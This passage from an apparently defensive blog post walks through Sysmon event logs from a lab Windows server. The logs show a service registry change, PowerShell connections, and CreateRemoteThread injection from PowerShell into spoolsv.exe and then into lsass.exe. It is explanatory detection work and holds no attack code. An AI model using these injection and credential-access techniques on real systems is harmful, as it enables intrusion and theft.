0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Level: <span class="Apple-converted-space"> </span>Information</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Keywords: <span class="Apple-converted-space"> </span></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">User:<span class="Apple-converted-space"> </span>SYSTEM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Computer:<span class="Apple-converted-space"> </span>wins2012r202.1011Labs.com</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Registry value set:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">RuleName: T1031,T1050</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">EventType: SetValue</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">UtcTime: 2020-07-19 20:04:17.225</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessGuid: {fc3f293c-bb4e-5f13-9e5b-000000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessId: 468</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Image: C:\Windows\system32\services.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">TargetObject: HKLM\System\CurrentControlSet\Services\axfvos\Start</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Details: DWORD (0x00000004)</span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">And another outbound connection:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Date:<span class="Apple-converted-space"> </span>7/19/2020 8:04:18 PM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Event ID:<span class="Apple-converted-space"> </span>3</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Task Category: Network connection detected (rule: NetworkConnect)</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Level: <span class="Apple-converted-space"> </span>Information</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Keywords: <span class="Apple-converted-space"> </span></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">User:<span class="Apple-converted-space"> </span>SYSTEM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Computer:<span class="Apple-converted-space"> </span>wins2012r202.1011Labs.com</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Network connection detected:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">RuleName: -</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">UtcTime: 2020-07-19 20:04:14.249</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessGuid: {fc3f293c-a718-5f14-49eb-430000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessId: 2752</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">User: 1011LABS\dave.hull</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Protocol: tcp</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Initiated: true</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">SourceIsIpv6: false</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">SourceIp: 10.47.47.17</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">SourceHostname: wins2012r202.1011Labs.com</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">SourcePort: 53247</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">SourcePortName: -</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">DestinationIsIpv6: false</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">DestinationIp: 10.47.47.26</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">DestinationHostname: -</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">DestinationPort: 80</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">DestinationPortName: http</font></span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">And now for something completely different. Our PowerShell process calls </font><font face="courier"><a href="https://www.google.com/search?q=win32+createremotethread&oq=win32+createremotethread&aqs=chrome.0.69i59j69i60.4519j0j7&sourceid=chrome&ie=UTF-8" target="_blank">CreateRemoteThread()</a></font><font face="inherit"> against spoolsv.exe:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Date:<span class="Apple-converted-space"> </span>7/19/2020 8:04:30 PM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Event ID:<span class="Apple-converted-space"> </span>8</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Task Category: CreateRemoteThread detected (rule: CreateRemoteThread)</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Level: <span class="Apple-converted-space"> </span>Information</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Keywords: <span class="Apple-converted-space"> </span></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">User:<span class="Apple-converted-space"> </span>SYSTEM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Computer:<span class="Apple-converted-space"> </span>wins2012r202.1011Labs.com</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">CreateRemoteThread detected:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">RuleName: -</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">UtcTime: 2020-07-19 20:04:30.116</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">SourceProcessGuid: {fc3f293c-a718-5f14-49eb-430000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">SourceProcessId: 2752</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">SourceImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">TargetProcessGuid: {fc3f293c-bb50-5f13-4008-010000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">TargetProcessId: 1120</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">TargetImage: C:\Windows\System32\spoolsv.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">NewThreadId: 212</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">StartAddress: 0x0000000000DC0000</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">StartModule: -</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">StartFunction: -</span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Above we looked at PowerShell allocating memory in its own process, populating that memory with shell code and creating a thread of execution. This is similar, but </font><font face="courier">CreateRemoteThread()</font><font face="inherit"> is used for starting a new thread of execution in another process. You might wonder why this is even possible in Windows. Microsoft's <a href="https://devblogs.microsoft.com/oldnewthing/author/oldnewthing" target="_blank">Raymond Chen</a> <a href="https://devblogs.microsoft.com/oldnewthing/20120808-00/?p=6913" target="_blank">explains</a>.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Date:<span class="Apple-converted-space"> </span>7/19/2020 8:05:04 PM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Event ID:<span class="Apple-converted-space"> </span>8</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Task Category: CreateRemoteThread detected (rule: CreateRemoteThread)</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Level: <span class="Apple-converted-space"> </span>Information</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Keywords: <span class="Apple-converted-space"> </span></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">User:<span class="Apple-converted-space"> </span>SYSTEM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Computer:<span class="Apple-converted-space"> </span>wins2012r202.1011Labs.com</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">CreateRemoteThread detected:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">RuleName: -</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">UtcTime: 2020-07-19 20:05:04.992</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">SourceProcessGuid: {fc3f293c-bb50-5f13-4008-010000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">SourceProcessId: 1120</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">SourceImage: C:\Windows\System32\spoolsv.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">TargetProcessGuid: {fc3f293c-bb4e-5f13-015e-000000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">TargetProcessId: 476</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">TargetImage: C:\Windows\System32\lsass.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span 